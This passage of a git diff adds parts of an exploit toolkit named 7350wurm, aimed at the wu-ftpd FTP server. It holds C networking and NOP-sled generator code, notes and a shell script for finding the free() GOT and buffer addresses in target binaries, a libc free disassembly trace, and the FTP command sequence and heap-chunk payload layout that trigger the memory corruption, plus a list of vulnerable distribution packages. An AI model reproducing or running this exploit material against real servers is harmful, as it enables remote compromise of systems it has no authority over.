+ftp_recv_until (int sock, char *buff, int len, char *begin)
+{
+        char    dbuff[2048];
+        if (buff == NULL) {
+                buff = dbuff;
+                len = sizeof (dbuff);
+        }
+        do {
+                memset (buff, '\x00', len);
+                if (net_rlinet (sock, buff, len - 1, 20) <= 0)
+                        return;
+        } while (memcmp (buff, begin, strlen (begin)) != 0);
+        return;
+}
+int
+ftp_login (char *host, char *user, char *pass)
+{
+        int     ftpsock;
+        char    resp[512];
+        ftpsock = net_connect (NULL, host, 21, 30);
+        if (ftpsock <= 0)
+                return (0);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline pre-login stuff (rfc violation !)
+         */
+        if (memcmp (resp, "220-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
+        if (memcmp (resp, "220 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        ftp_banner = strdup (resp);
+        net_write (ftpsock, "USER %s\n", user);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        if (memcmp (resp, "331 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        net_write (ftpsock, "PASS %s\n", pass);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline responses from ftp servers
+         */
+        if (memcmp (resp, "230-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
+        if (memcmp (resp, "230 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        return (ftpsock);
+flerr:
+        if (ftpsock > 0)
+                close (ftpsock);
+        return (0);
+}
+/* ripped from zodiac */
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        printf ("/* %s, %u bytes */\n", desc, amount);
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+        return;
+}
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+        i = inet_addr(host);
+        if (i == -1) {
+                he = gethostbyname(host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+int
+net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec)
+{
+        int                     n,
+                                len,
+                                error,
+                                flags;
+        int                     fd;
+        struct timeval          tv;
+        fd_set                  rset, wset;
+        struct sockaddr_in      csa;
+        if (cs == NULL)
+                cs = &csa;
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+                return (-1);
+        }
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+                return (-1);
+        }
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+                return (-1);
+        }
+        error = 0;
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+        FD_ZERO(&rset);
+        FD_ZERO(&wset);
+        FD_SET(fd, &rset);
+        FD_SET(fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        n = select(fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close(fd);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+                        len = sizeof(error);
+                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+done:
+        n = fcntl(fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+void
+net_write (int fd, const char *str, ...)
+{
+        char    tmp[1025];
+        va_list vl;
+        int     i;
+        va_start(vl, str);
+        memset(tmp, 0, sizeof(tmp));
+        i = vsnprintf(tmp, sizeof(tmp), str, vl);
+        va_end(vl);
+#ifdef DEBUG
+        printf("[snd] %s\n", tmp);
+#endif
+        send(fd, tmp, i, 0);
+        return;
+}
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+        int                     n;
+        unsigned long int       rb = 0;
+        struct timeval          tv_start, tv_cur;
+        memset(buf, '\0', bufsize);
+        (void) gettimeofday(&tv_start, NULL);
+        do {
+                (void) gettimeofday(&tv_cur, NULL);
+                if (sec > 0) {
+                        if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+                                ((tv_start.tv_sec * 1000000) + (tv_start.tv_usec))) > (sec * 1000000)) {
+                                return (-1);
+                        }
+                }
+                n = net_rtimeout(fd, NET_READTIMEOUT);
+                if (n <= 0) {
+                        return (-1);
+                }
+                n = read(fd, buf, 1);
+                if (n <= 0) {
+                        return (n);
+                }
+                rb++;
+                if (*buf == '\n')
+                        return (rb);
+                buf++;
+                if (rb >= bufsize)
+                        return (-2);    /* buffer full */
+        } while (1);
+}
+int
+net_rtimeout (int fd, int sec)
+{
+        fd_set          rset;
+        struct timeval  tv;
+        int             n, error, flags;
+        error = 0;
+        flags = fcntl(fd, F_GETFL, 0);
+        n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1)
+                return (-1);
+        FD_ZERO(&rset);
+        FD_SET(fd, &rset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        /* now we wait until more data is received then the tcp low level watermark,
+         * which should be setted to 1 in this case (1 is default)
+         */
+        n = select(fd + 1, &rset, NULL, NULL, &tv);
+        if (n == 0) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1) {
+                return (-1);
+        }
+        /* socket readable ? */
+        if (FD_ISSET(fd, &rset)) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                return (1);
+        } else {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+}
+/* imported from shellkit */
+unsigned long int
+random_get (unsigned long int low, unsigned long int high)
+{
+        unsigned long int       val;
+        if (low > high) {
+                low ^= high;
+                high ^= low;
+                low ^= high;
+        }
+        val = (unsigned long int) random ();
+        val %= (high - low);
+        val += low;
+        return (val);
+}
+void
+random_init (void)
+{
+        srandom (time (NULL));
+}
+int
+bad (unsigned char u)
+{
+        if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
+                return (1);
+        return (0);
+}
+int
+badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
+{
+        int     n;
+        for (code_len -= 1 ; code_len >= 0 ; --code_len) {
+                for (n = 0 ; n < bad_len ; ++n)
+                        if (code[code_len] == bad[n])
+                                return (1);
+        }
+        return (0);
+}
+unsigned long int
+x86_nop_rwreg (void)
+{
+        unsigned long int       reg;
+        do {
+                reg = random_get (0, 7);
+        } while (reg == 4);     /* 4 = $esp */
+        return (reg);
+}
+unsigned long int
+x86_nop_xfer (char *xferstr)
+{
+        int                     bw = 0; /* bitfield walker */
+        unsigned char           tgt;    /* resulting instruction */
+        /* in a valid xferstr we trust */
+        for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
+                switch (xferstr[0]) {
+                case ('0'):
+                        BSET (tgt, 1, 0, bw);
+                        break;
+                case ('1'):
+                        BSET (tgt, 1, 1, bw);
+                        break;
+                case ('r'):
+                        BSET (tgt, 3, x86_nop_rwreg (), bw);
+                        break;
+                case ('.'):
+                        break;  /* ignore */
+                default:
+                        fprintf (stderr, "on steroids, huh?\n");
+                        exit (EXIT_FAILURE);
+                        break;
+                }
+        }
+        if (bw != 8) {
+                fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
+                exit (EXIT_FAILURE);
+        }
+        return (tgt);
+}
+unsigned int
+x86_nop (unsigned char *dest, unsigned int dest_len,
+        unsigned char *bad, int bad_len)
+{
+        int     walk;
+        int     bcount; /* bad counter */
+        char *  xs;
+        char *  xferstr[] = {
+                "0011.0111",    /* aaa */
+                "0011.1111",    /* aas */
+                "1001.1000",    /* cbw */
+                "1001.1001",    /* cdq */
+                "1111.1000",    /* clc */
+                "1111.1100",    /* cld */
+                "1111.0101",    /* cmc */
+                "0010.0111",    /* daa */
+                "0010.1111",    /* das */
+                "0100.1r",      /* dec <reg> */
+                "0100.0r",      /* inc <reg> */
+                "1001.1111",    /* lahf */
+                "1001.0000",    /* nop */
+                "1111.1001",    /* stc */
+                "1111.1101",    /* std */
+                "1001.0r",      /* xchg al, <reg> */
+                NULL,
+        };
+        unsigned char   tgt;
+        for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
+                /* avoid endless loops on excessive badlisting */
+                for (bcount = 0 ; bcount < 16384 ; ++bcount) {
+                        xs = xferstr[random_get (0, 15)];
+                        tgt = x86_nop_xfer (xs);
+                        dest[walk] = tgt;
+                        if (badstr (&dest[walk], 1, bad, bad_len) == 0)
+                                break;
+                }
+                /* should not happen */
+                if (bcount >= 16384) {
+                        fprintf (stderr, "too much blacklisting, giving up...\n");
+                        exit (EXIT_FAILURE);
+                }
+        }
+        return (walk);
+}
diff --git a/exploits/7350wurm/doc/for-scut.txt b/exploits/7350wurm/doc/for-scut.txt
new file mode 100644
index 0000000..3045d29
--- /dev/null
+++ b/exploits/7350wurm/doc/for-scut.txt
@@ -0,0 +1,48 @@
+## get the version string
+[dvorak@redhat get-offset]$ strings in.ftpd | grep ^Version
+Version wu-2.6.1-16
+## get the GOT address of free
+[dvorak@redhat get-offset]$ objdump --dynamic-reloc in.ftpd > dynrel
+[dvorak@redhat get-offset]$ grep free dynrel
+0807314c R_386_JUMP_SLOT   free
+0807319c R_386_JUMP_SLOT   globfree64
+## get cbuf
+[dvorak@redhat get-offset]$ objdump --disassemble in.ftpd > disass
+objdump: in.ftpd: no symbols
+[dvorak@redhat get-offset]$ objdump -T in.ftpd > dynsym
+## first get address of strncasecmp
+[dvorak@redhat get-offset]$ grep strncasecmp dynsym
+0804acd8      DF *UND*  00000065  GLIBC_2.0   strncasecmp
+## look for calls with 3rd argument 0xa
+[dvorak@redhat get-offset]$ grep 804acd8 -B3 disass | grep '\$0xa'
+ 805a788:       6a 0a                   push   $0xa
+## see what is used as first argument (cbuf) to strncasecmp
+[dvorak@redhat get-offset]$ grep -A3 '^ 805a788' disass
+ 805a788:       6a 0a                   push   $0xa
+ 805a78a:       68 43 d7 06 08          push   $0x806d743
+ 805a78f:       53                      push   %ebx
+ 805a790:       e8 43 05 ff ff          call   0x804acd8
+## its, ebx, see where ebx gets set
+[dvorak@redhat get-offset]$ grep -B100 '^ 805a788' disass | grep ebx
+ 805a68a:       bb e0 5d 08 08          mov    $0x8085de0,%ebx
+ 805a6b0:       43                      inc    %ebx
+ 805a6b1:       0f b6 13                movzbl (%ebx),%edx
+ 805a6de:       89 df                   mov    %ebx,%edi
+ 805a6fa:       bb 04 00 00 00          mov    $0x4,%ebx
+ 805a704:       89 1d e0 64 07 08       mov    %ebx,0x80764e0
+### EUREKA last place where ebx is set .. so cbuf is at .. 0x8085de0
+ 805a70a:       bb e0 5d 08 08          mov    $0x8085de0,%ebx
+ 805a712:       0f b6 14 1e             movzbl (%esi,%ebx,1),%edx
+ 805a719:       c6 04 1e 00             movb   $0x0,(%esi,%ebx,1)
+ 805a71d:       53                      push   %ebx
+ 805a72d:       53                      push   %ebx
+ 805a752:       53                      push   %ebx
+ 805a772:       53                      push   %ebx
+## that's all folks
diff --git a/exploits/7350wurm/doc/free.txt b/exploits/7350wurm/doc/free.txt
new file mode 100644
index 0000000..33fa2ba
--- /dev/null
+++ b/exploits/7350wurm/doc/free.txt
@@ -0,0 +1,77 @@
+break *0x8058afb
+0x400aacc8 <__libc_free>:       push   %ebp
+0x400aacc9 <__libc_free+1>:     mov    %esp,%ebp
+0x400aaccb <__libc_free+3>:     push   %edi
+0x400aaccc <__libc_free+4>:     push   %esi
+0x400aaccd <__libc_free+5>:     push   %ebx
+0x400aacce <__libc_free+6>:     call   0x400aacd3 <__libc_free+11>
+0x400aacd3 <__libc_free+11>:    pop    %ebx
+0x400aacd4 <__libc_free+12>:    add    $0x957b9,%ebx
+0x400aacda <__libc_free+18>:    mov    0x8(%ebp),%ecx                   ; ecx = parameter
+0x400aacdd <__libc_free+21>:    mov    0x848(%ebx),%eax
+0x400aace3 <__libc_free+27>:    mov    (%eax),%eax                      ; __free_hook
+0x400aace5 <__libc_free+29>:    test   %eax,%eax                        ; == NULL ?
+0x400aace7 <__libc_free+31>:    je     0x400aacf4 <__libc_free+44>      ; -> skip
+0x400aace9 <__libc_free+33>:    pushl  0x4(%ebp)
+0x400aacec <__libc_free+36>:    push   %ecx
+0x400aaced <__libc_free+37>:    call   *%eax
+0x400aacef <__libc_free+39>:    jmp    0x400aad8a <__libc_free+194>
+0x400aacf4 <__libc_free+44>:    test   %ecx,%ecx                        ; free (NULL) ?
+0x400aacf6 <__libc_free+46>:    je     0x400aad8a <__libc_free+194>     ; -> exit
+0x400aacfc <__libc_free+52>:    lea    0xfffffff8(%ecx),%esi            ; esi = ecx - 8
+0x400aacff <__libc_free+55>:    mov    0xfffffffc(%ecx),%eax            ; eax = [ecx - 4] (size)
+0x400aad02 <__libc_free+58>:    test   $0x2,%al                         ; mmapped ?
+0x400aad04 <__libc_free+60>:    je     0x400aad30 <__libc_free+104>
+0x400aad06 <__libc_free+62>:    and    $0xfc,%al                        ; MUNMAP
+0x400aad08 <__libc_free+64>:    decl   0xfffff010(%ebx)
+0x400aad0e <__libc_free+70>:    mov    %eax,%edx
+0x400aad10 <__libc_free+72>:    add    0xfffffff8(%ecx),%edx
+0x400aad13 <__libc_free+75>:    sub    %edx,0xfffff018(%ebx)
+0x400aad19 <__libc_free+81>:    mov    0xfffffff8(%ecx),%edx
+0x400aad1c <__libc_free+84>:    add    %edx,%eax
+0x400aad1e <__libc_free+86>:    push   %eax
+0x400aad1f <__libc_free+87>:    sub    %edx,%esi
+0x400aad21 <__libc_free+89>:    push   %esi
+0x400aad22 <__libc_free+90>:    call   0x400ffd80 <__munmap>
+0x400aad27 <__libc_free+95>:    jmp    0x400aad8a <__libc_free+194>
+0x400aad29 <__libc_free+97>:    lea    0x0(%esi,1),%esi
+0x400aad30 <__libc_free+104>:   lea    0xffffebb4(%ebx),%eax
+0x400aad36 <__libc_free+110>:   cmp    0xffffebbc(%ebx),%esi
+0x400aad3c <__libc_free+116>:   jae    0x400aad46 <__libc_free+126>
+0x400aad3e <__libc_free+118>:   cmp    0xfffff008(%ebx),%esi
+0x400aad44 <__libc_free+124>:   jae    0x400aad52 <__libc_free+138>
+0x400aad46 <__libc_free+126>:   mov    %esi,%edx
+0x400aad48 <__libc_free+128>:   and    $0xfff00000,%edx
+segfault
+0x400aad4e <__libc_free+134>:   mov    (%edx),%edi
+0x400aad50 <__libc_free+136>:   jmp    0x400aad54 <__libc_free+140>
+0x400aad52 <__libc_free+138>:   mov    %eax,%edi
+0x400aad54 <__libc_free+140>:   cmpl   $0x0,0x738(%ebx)
+0x400aad5b <__libc_free+147>:   je     0x400aad6c <__libc_free+164>
+0x400aad5d <__libc_free+149>:   lea    0x410(%edi),%eax
+0x400aad63 <__libc_free+155>:   push   %eax
+0x400aad64 <__libc_free+156>:   call   0x400684ec <_ufc_foobar+223884>
+0x400aad69 <__libc_free+161>:   add    $0x4,%esp
+0x400aad6c <__libc_free+164>:   mov    %esi,%edx
+0x400aad6e <__libc_free+166>:   mov    %edi,%eax
+0x400aad70 <__libc_free+168>:   call   0x400aad94 <chunk_free>
+0x400aad75 <__libc_free+173>:   cmpl   $0x0,0x74c(%ebx)
+0x400aad7c <__libc_free+180>:   je     0x400aad8a <__libc_free+194>
+0x400aad7e <__libc_free+182>:   lea    0x410(%edi),%eax
+0x400aad84 <__libc_free+188>:   push   %eax
+0x400aad85 <__libc_free+189>:   call   0x40068d7c <_ufc_foobar+226076>
+0x400aad8a <__libc_free+194>:   lea    0xfffffff4(%ebp),%esp
+0x400aad8d <__libc_free+197>:   pop    %ebx
+0x400aad8e <__libc_free+198>:   pop    %esi
+0x400aad8f <__libc_free+199>:   pop    %edi
+0x400aad90 <__libc_free+200>:   leave  
+0x400aad91 <__libc_free+201>:   ret    
+0x400aad92 <__libc_free+202>:   mov    %esi,%esi
diff --git a/exploits/7350wurm/doc/syn.txt b/exploits/7350wurm/doc/syn.txt
new file mode 100644
index 0000000..79e75a3
--- /dev/null
+++ b/exploits/7350wurm/doc/syn.txt
@@ -0,0 +1,73 @@
+USER ftp
+PASS mozilla@
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././././././././././.
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+RNFR ././././
+CWD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCDDDD44445555
+CWD ~/{.,.,.,.}
+RNFR ././././././././
+CWD AAAAsiz
+CWD AAAAsi
+CWD AAAAi
+RNFR .
+RNFR ././././././././
+CWD ~{
diff --git a/exploits/7350wurm/doc/synnergy-method.txt b/exploits/7350wurm/doc/synnergy-method.txt
new file mode 100644
index 0000000..96b64ea
--- /dev/null
+++ b/exploits/7350wurm/doc/synnergy-method.txt
@@ -0,0 +1,16 @@
+<dvorak> blaat.append('A', 96+32);               /* padding */
+<dvorak> blaat.append(0xfffffff0);               /* the chunk */
+<dvorak> blaat.append(-4);
+<dvorak> blaat.append( 0x0806f7ac - 12 );
+<dvorak> blaat.append( 0xbffffb49 );
+<dvorak> conn.sendout("CWD %s\r\n", blaat.c_str());
+<dvorak> conn.sendout("CWD %s\r\n", "~/{.,.,.,.}"); /*getting pointer on the heap */
+<dvorak> conn.sendout("RNFR %s\r\n", "././././././././");    /* 24 */
+<dvorak> conn.sendout("CWD %s\r\n", "AAAAsiz");  /* buidling size field */
+<dvorak> conn.sendout("CWD %s\r\n", "AAAAsi");
+<dvorak> conn.sendout("CWD %s\r\n", "AAAA\x69");
+<dvorak> conn.sendout("RNFR .\r\n");             /* keeping it malloced */
+<dvorak> conn.sendout("RNFR %s\r\n", "././././././././");    /* filling */
+<dvorak> conn.sendout("CWD ~{\r\n"); /* BOOM */
diff --git a/exploits/7350wurm/offset-find.sh b/exploits/7350wurm/offset-find.sh
new file mode 100644
index 0000000..7624071
--- /dev/null
+++ b/exploits/7350wurm/offset-find.sh
@@ -0,0 +1,57 @@
+#!/bin/sh
+# 7350wurm offset finder
+# dvorak & scut
+check_util ()
+{
+        for util in $*; do
+                echo -n "checking for $util: "
+                if ! which $util; then
+                        echo "not found, aborting"
+                        exit
+                fi
+        done
+}
+echo "7350wurm exploit offset finder"
+echo
+if [ $# != 1 ]; then
+        echo "usage: $0 /path/to/wuftpd/binary"
+        echo
+        exit
+fi;
+check_util strings objdump
+echo
+versionstring=`strings $1 | grep ^Version`
+echo $versionstring
+freeaddr=`objdump -R $1 | grep free$ | grep -v glob | awk '{print $1}'`
+echo $freeaddr
+strncasecmpaddr=`objdump -T $1 | grep strncasecmp | awk '{print $1}' | \
+        sed "s/^0*//g"`
+echo # $strncasecmpaddr
+tmpaddr=`objdump --disassemble $1 2>/dev/null | grep -B3 $strncasecmpaddr | \
+        grep "\\$0xa" | awk '{print $1}' | cut -d ':' -f1`
+echo # found at $tmpaddr
+tmpreg=`objdump --disassemble $1 | grep -A3 "^ $tmpaddr" | head -3 | \
+        tail -1 | cut -d '%' -f2`
+echo # $tmpreg
+cbufaddr=`objdump --disassemble $1 | grep -B200 "^ $tmpaddr" | grep $tmpreg | \
+        grep "\\$0x80" | head -1 | cut -d '$' -f2- | cut -c -9`
+echo "target:"
+echo
+echo '{ "insert exact dist, rpm, .. here",'
+echo \"$versionstring\",
+echo 'x86_wrx, sizeof (x86_wrx) - 1,'
+echo 0x$freeaddr, $cbufaddr },
+echo
diff --git a/exploits/7350wurm/openbsd-ftpd-linux.txt b/exploits/7350wurm/openbsd-ftpd-linux.txt
new file mode 100644
index 0000000..77aabfa
--- /dev/null
+++ b/exploits/7350wurm/openbsd-ftpd-linux.txt
@@ -0,0 +1,7 @@
+[bnuts(bnuts@ext-user.7350.org)] the key to exploit it
+[bnuts(bnuts@ext-user.7350.org)] RNFR "A"x80*4."}"
+[bnuts(bnuts@ext-user.7350.org)] LIST ~{
+[msg(bnuts)] hey, thanks :)
+[bnuts(bnuts@ext-user.7350.org)] the problem is in libc, it starts scanning for '}' after the end
+          of the argument for glob()
+[bnuts(bnuts@ext-user.7350.org)] [the pattern[
diff --git a/exploits/7350wurm/rpm/done/redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm b/exploits/7350wurm/rpm/done/redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm
new file mode 100644
index 0000000..2edc7b3
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm b/exploits/7350wurm/rpm/done/redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm
new file mode 100644
index 0000000..2edc7b3
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm b/exploits/7350wurm/rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm
new file mode 100644
index 0000000..00f80d4
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm b/exploits/7350wurm/rpm/done/redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm
new file mode 100644
index 0000000..7cace33
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm b/exploits/7350wurm/rpm/done/redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm
new file mode 100644
index 0000000..aa38d9b
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm b/exploits/7350wurm/rpm/done/redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm
new file mode 100644
index 0000000..aa38d9b
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm b/exploits/7350wurm/rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm
new file mode 100644
index 0000000..0979d0a
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm b/exploits/7350wurm/rpm/done/redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm
new file mode 100644
index 0000000..aa38d9b
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm b/exploits/7350wurm/rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm
new file mode 100644
index 0000000..9063b82
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm b/exploits/7350wurm/rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm
new file mode 100644
index 0000000..3da1eab
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm b/exploits/7350wurm/rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm
new file mode 100644
index 0000000..86c4ebe
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/suse6061update_wuftpd-2.6.0-151.i386.rpm b/exploits/7350wurm/rpm/done/suse6061update_wuftpd-2.6.0-151.i386.rpm
new file mode 100644
index 0000000..b5fbcc9
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/suse6061update_wuftpd-2.6.0-151.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/suse62update_wuftpd-2.6.0-121.i386.rpm b/exploits/7350wurm/rpm/done/suse62update_wuftpd-2.6.0-121.i386.rpm
new file mode 100644
index 0000000..05fc0a7
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/suse62update_wuftpd-2.6.0-121.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/suse70default_wuftpd.rpm b/exploits/7350wurm/rpm/done/suse70default_wuftpd.rpm
new file mode 100644
index 0000000..7f6536c
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/suse70default_wuftpd.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/suse71default_wuftpd.rpm b/exploits/7350wurm/rpm/done/suse71default_wuftpd.rpm
new file mode 100644
index 0000000..9aa348b
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/suse71default_wuftpd.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/suse72default_wuftpd.rpm b/exploits/7350wurm/rpm/done/suse72default_wuftpd.rpm
new file mode 100644
index 0000000..01b387c
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/suse72default_wuftpd.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/done/suse73default_wuftpd.rpm b/exploits/7350wurm/rpm/done/suse73default_wuftpd.rpm
new file mode 100644
index 0000000..566eb81
--- /dev/null
+++ b/exploits/7350wurm/rpm/done/suse73default_wuftpd.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm b/exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm
new file mode 100644
index 0000000..6502301
--- /dev/null
+++ b/exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm
Binary files differ
